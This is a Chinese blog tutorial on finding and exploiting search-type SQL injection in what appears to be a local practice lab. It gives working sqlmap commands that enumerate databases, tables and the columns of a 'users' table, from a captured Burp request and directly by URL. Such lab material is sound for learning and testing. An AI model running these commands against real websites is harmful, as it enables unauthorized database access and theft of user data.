sqlmap注入之（搜索型）注入

博主： literature
发布时间：2019 年 04 月 04 日
128 次浏览
关闭评论
494字数
分类：主机教程

验证是否有注入

我们直接输入一个字符k，点击搜索。

提示未见异常
我们输入关键字%k%
效果如下：

此时，我们可以得出，存在搜索型注入漏洞

攻击方式一

利用burp抓包，将包中的文件另存为22.txt

将22.txt放到sqlmap根目录 /usr/share/sqlmap

爆出数据库

sqlmap -r "22.txt" --dbs

爆出表

sqlmap -r "22.txt" -D lou --tables

爆出表结构

sqlmap -r "22.txt" -D lou -T users --columns

方式二

不需要抓包保存文件的形式，直接执行命令

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/940.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

sqlmap注入之（搜索型）注入

literature • 2019 年 04 月 04 日

<h3>验证是否有注入</h3><p>我们直接输入一个字符<code>k</code>，点击搜索。<br /><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qfaonhd9j20h708a74d.jpg" alt="QQ截图20190404110620.png" title="QQ截图20190404110620.png" style="" class="aligncenter"style=""></p><p>提示未见异常<br />我们输入关键字<code>%k%</code><br />效果如下：<br /><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qfb9lp84j20hc09wjri.jpg" alt="QQ截图20190404110711.png" title="QQ截图20190404110711.png" style="" class="aligncenter"style=""><br />此时，我们可以得出，存在搜索型注入漏洞</p><h3>攻击方式一</h3><p>利用<code>burp</code>抓包，将包中的文件另存为<code>22.txt</code><br /><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qfdej0kcj20ji06tq39.jpg" alt="QQ截图20190404110915.png" title="QQ截图20190404110915.png" style="" class="aligncenter"style=""></p><p>将<code>22.txt</code>放到<code>sqlmap</code>根目录 <img src="https://blog.bbskali.cn/usr/themes/handsome/assets/img/emotion/twemoji/smile.png" class="aligncenter"> <code>/usr/share/sqlmap</code></p><h3>爆出数据库</h3><pre><code>sqlmap -r "22.txt" --dbs</code></pre><p><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qffynn4yj20js08yab9.jpg" alt="QQ截图20190404111143.png" title="QQ截图20190404111143.png" style="" class="aligncenter"style=""></p><h3>爆出表</h3><pre><code>sqlmap -r "22.txt" -D lou --tables</code></pre><p><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qfhlh5yzj20k20b40ub.jpg" alt="QQ截图20190404111319.png" title="QQ截图20190404111319.png" style="" class="aligncenter"style=""></p><h3>爆出表结构</h3><pre><code>sqlmap -r "22.txt" -D lou -T users --columns</code></pre><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g1qfk78z0qj20jl0a50ud.jpg" alt="QQ截图20190404111547.png" title="QQ截图20190404111547.png" style="" class="aligncenter"style=""></p><h3>方式二</h3><p>不需要抓包保存文件的形式，直接执行命令</p><pre><code>sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs
</code></pre><p><img src="https://wx3.sinaimg.cn/large/cc788230ly1g1qfog0axtj20jn0bjdj2.jpg" alt="QQ截图20190404111950.png" title="QQ截图20190404111950.png" style="" class="aligncenter"style=""></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/940.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

sqlmap注入之（搜索型）注入

验证是否有注入

攻击方式一

爆出数据库

爆出表

爆出表结构

方式二

live/msn等微软绝版邮箱详细的注册教程

欢迎使用 Typecho

一个功能强大又好用的RSS订阅器：FreshRSS安装教程

VPS使用BaiduPCS-Go高速下载百度网盘的文件，支持上传/离线下载等操作

使用Caddy申请免费的Let’s Encrypt泛域名SSL证书

CentOS安装配置Samba服务

cdn.xxhzm.cn 免费的静态资源加速

封装ajax请求

Golang在Mac、Linux、Windows下交叉编译

一个生成可自定义地址的短链接URL网站

sqlmap注入之（搜索型）注入